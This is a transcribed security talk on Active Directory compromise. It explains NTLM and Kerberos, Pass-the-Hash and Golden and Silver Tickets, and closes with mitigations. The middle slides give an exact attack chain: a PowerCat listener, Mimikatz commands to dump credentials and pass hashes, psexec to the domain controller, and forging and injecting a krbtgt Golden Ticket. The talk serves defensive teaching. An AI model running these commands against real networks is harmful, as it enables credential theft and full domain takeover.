Michael Mayer-Gishyan NSA IT Consulting From Zero to Hero. Domain Admin in einem Tag

Transcription

1 Michael Mayer-Gishyan NSA IT Consulting From Zero to Hero Domain Admin in einem Tag

2 Agenda Vita Introduction to NTLM and Kerberos Pass-the-Hash Techniques First Breach Horizontal and vertical Target hopping Credential-Theft and Right-Elevation Total Active Directory Invasion Mitigation, Mitigation, Mitigation Credits

3 Vita Freelancer IT Security Consultant Blue Team / Cyber Defense Microsoft Addict Motorcyclist BBQ Fanatic Fulltime Geek

4 Introduction to NTLM and Kerberos NTLM (NT LAN Manager) Hashed password on Windows Systems Versions: LM, NTLM, NTLMv2 Used as fallback for Kerberos Computer Accounts also have Passwords Authentication Process: User puts in password on local system Password is hashed The hash will be compared with the one from the Local Security Authority If they match, the access is granted

5 Introduction to NTLM and Kerberos Kerberos Can only be used with Active Directory Works with tickets TGT (Ticket Granting Ticket) - Used for accessing the AD TGS (Ticket Granting Service) - Used for accessing a Service Authentication Process (1/2): AS-REQ: Request for a TGT to the KDC (Key Distribution Center) Encrypted with the ekey (Long Term Key/Encryption Key/User Password) This request has the same as the NTLM Hash (with RC4) AS-REP: If valid, KDC sends back a TGT encrypted with the ekey of the krbtgt Account krbtgt = Kerberos TGT Account = KDC (the same on all DCs) Ticket includes a PAC (Privilege Attribute Certificate) which stores all access groups for the user

6 Introduction to NTLM and Kerberos Authentication Process (2/2): TGS-REQ: To access a resource (CIFS, RPC, etc.) a TGS must be requested Includes the TGT and the Hostname for the server which provides the resource TGS-REP: KDC includes the PAC info and encrypts the TGS with the ekey of the target Server The PAC includes the access rights on the destination AP-REQ: User forwards the TGS to the server and it encrypts it If the decryption succeeds, the server knows that the TGS is valid Because only the KDC knows the ekey, it must assume that this information is correct PAC Validation for built-in services appears after 20 Minutes Like CIFS, RPC, DNS etc.

7 What is Pass-the-Hash? Pass-the-Hash uses the Hash instead of the plaintext Password Resources can be accessed without knowing the actual password Where do I find Password Hashes? LSASS.exe (Local Security Authority Security Subsystem) Memory - Also Dump Files and VM Memory Files Registry NTDS.DIT (Complete AD Database on every Domain Controller) RODC (Read-only DC) only store defined credentials Bbb..but why is nobody doing something? It s not a bug, it s a feature! Without, users need to input their password every time a resource is accessed

8 What is Overpass-the-Hash? The same as Pass-The-Hash, only with Kerberos Instead of the password, the NTLM hash will be used to request Tickets A variant is Pass-the-Key RC4 Key = NTLM hash of the password, not salted by the KDC Can be cracked when the password is weak Also AES128 and AES256 keys can be used Hard to crack, salted and 4096 iterations of the PBKDF2 algorithm Where do I find those keys? LSASS.exe (Client) Except for the Protected Users Security Group (Windows 8 and above) KDC (DC)

9 What is Pass-the-Ticket? A Ticket (TGT) can be stolen and reused by anybody AS-REQ and AS-REP will be skipped TGS-REQ and TGS-REP will be granted by the KDC A stolen TGS won t be noticed by the KDC AP-REQ is only between client and target server Must have want Look for them in the RAM Yes, you can also use dumps

10 What is a Golden Ticket? This is the holy grail, the ticket of all tickets! With it you can access everything in AD It is valid for 20 minutes (PAC Validation) But then you can forge another one Okay, okay I am sold, what do I need? The hash of the krbtgt Account It is almost never changed Basically a TGT is only a TGS for the KDC Domain SID, some Groups, a Username

11 What is a Golden Ticket? HOW is this possible???? Every policy is client side enforced Logon hours, Password expiration, Group Memberships, etc. Only after 20 Minutes the PAC is checked with the KDC Within that period you can do anything! Even create valid tickets for non existing User Accounts Silver Tickets A golden Ticket limited to a single server Created by the hash of the Computer Account Mother of all backdoors -> no communication with KDC

12 First Breach First access to the network through: DMZ attack Malware Exploits Social Engineering Backdoors Physical access

13 First Breach Preparations Login with User Account Start - Run powershell. C:\Tools\PowerCat.ps1 Powercat -l -p -v 4444 Loads PS function for PowerCat listener Don t forget the leading dot! This is your attackers window

14 First Breach Control WS over shell whoami hostname dir C:\WINDOWS\SysWoW64\Config Easy Admin-Rights Check. C:\Tools\Invoke-Mimikatz.ps1 Loads PS function for mimikatz Don t forget the leading dot! Invoke-Mimikatz -command "privilege::debug sekurlsa::logonpasswords Cleartext Passwords!!! *evilgrin*

15 First Breach Where to find credentials? LSASS.exe / RAM Saved Passwords Applications Websites RDP files (Decryption is documented) Group Policies (Patched) WIM images / sysprep.xml (Patched) Backups files VM memory files Scheduled Tasks Service Accounts

16 Horizontal and vertical Target hopping Horizontal Check the local Administrator Credentials They are not changed regularly Often they are the same on Clients Vertical Look for credentials on other hosts Deploy a Keylogger Provoke logon by privileged account tskill explorer.exe

17 Credential-Theft and Right-Elevation C:\Tools\Helpdesk-Me.cmd This will do a local logon with the helpdesk user net user helpdesk /domain Gives a overview in which AD groups the user is C:\Tools\mimikatz.exe (Run as Administrator) privilege::debug sekurlsa::logonpasswords Copy the NTLM hash into clipboard sekurlsa::pth /user:helpdesk /domain:evil.corp /ntlm:hash /run cmd.exe Opens shell with injected hash

18 Credential-Theft and Right-Elevation Check this out! whoami klist dir \\sv01\c$ dir \\dc01\c$ psexec \\sv01 cmd.exe

19 Credential-Theft and Right-Elevation Credential search on a higher tier (Server Level) C:\Tools\mimikatz.exe (Run as Administrator) privilege::debug sekurlsa::logonpasswords Service Account found No plaintext passwords because Wdigest is disabled Copy the NTLM hash! sekurlsa::pth /user:highservice /domain:evil.corp /ntlm:hash /run cmd net user highservice /domain Special account is special! dir \\dc01\c$ klist

20 Total Active Directory Invasion Connect to the Domain Controller psexec \\dc01 cmd C:\Tools\mimikatz.exe privilege::debug lsadump::lsa /inject /name:krbtgt kerberos::golden /domain:evil.corp /sid:<sid> /rc4:<hash> /user:administrator /id:500 /groups:500,501,512,513,518,519,520 /ticket: golden.kirbi Copy this file to your workstation copy golden.kirbi \\WS01\C$\Tools\

21 Total Active Directory Invasion WS: C:\Tools\mimikatz.exe Kerberos::ptt yourname.kirbi Note that there is no privilege::debug needed! misc::cmd Injects Golden Ticket into a cmd window Domain wide entrance card to everything! dir \\dc01\c$ dir \\sv01\c$ COPY ALL THE THINGS!!!! NTDS.DIT - Full AD Database IMPLEMENT ALL THE BACKDOORS!!!! Use Silver Tickets

22

23

24 Mitigation, Mitigation, Mitigation What can I do against this dark sorcery? Implement a tight password change routine (1/2) Computer Accounts: 1 Day Default: 30 Days Service Accounts: 3 Months or use (Group) Managed Service Accounts Default: C mon, be honest. Nobody changes them EVER! krbtgt: Every year or when a Domain Admin leaves Default: Once in like years (when upgrading from DFL 2003 to 2008) User Accounts: 90 Days - The shorter the period is, the easier the passwords get Default: 30 Days DSRM (Directory Services Restore Mode): Twice a year - must be synced manually! Default: Never

25 Mitigation, Mitigation, Mitigation Implement a tight password change routine (2/2) Local Administrator Accounts: 30 days Default: Never Use LAPS (Local Administrator Password Solution) by Microsoft Check the logins of privileged accounts Who leaves traces on which host? Use separate Administration Accounts Never use privileged accounts on your client Domain Admins and similar should use dedicated Administration Workstations No Internet Access Separated from the regular client Use stricter Group Policy Settings

26 Mitigation, Mitigation, Mitigation Check misconfiguration and implement a hardening standard Updates and Patching - This is vital to a healthy infrastructure MS Patch new DCs before promoting! Secure your Clients Don t forget the user! Security Awareness Programs Deploy EMET Log PowerShell and CMD execution AppLocker - Application Whitelisting Solution Deploy it in the DMZ and also on the Clients Use simple rules and adopt legacy apps Use Honeypots to deploy fake credentials Could also be done somewhere hidden on the clients

27 Mitigation, Mitigation, Mitigation Use Jump Gates / Bastion Hosts / Admin Terminal Servers Train your Administrators how to use them Implement a very strict Group Policy A loose configured Terminal Server is a Security Breach, not a Gain! Logging Microsoft ATA Automatically detects PtH, PtT, Golden Ticket attacks Uses a lot disk space SIEM Monitor your clients! Use generous thresholds Check Scheduled Tasks, Autoruns and Environmental Variables Name a specialist who is responsible for following daily security breaches

28 Credits Benjamin Delpy / mimikatz Author Alva Skip Duckwall / PtH Expert Joe Bialek / PowerSploit Author & MSRC Nikhil Mittal / Nishang Author & PowerShell Guru Sean Metcalf / AD Security Specialist - adsecurity.org Microsoft / I <3 U, your software keeps me busy My Wife / I <3 U 2, but somewhat different Everybody who contributes in the name of cyber security

29 Thanks for your attention! Free Anti-Spy Webcam Stickers available at my desk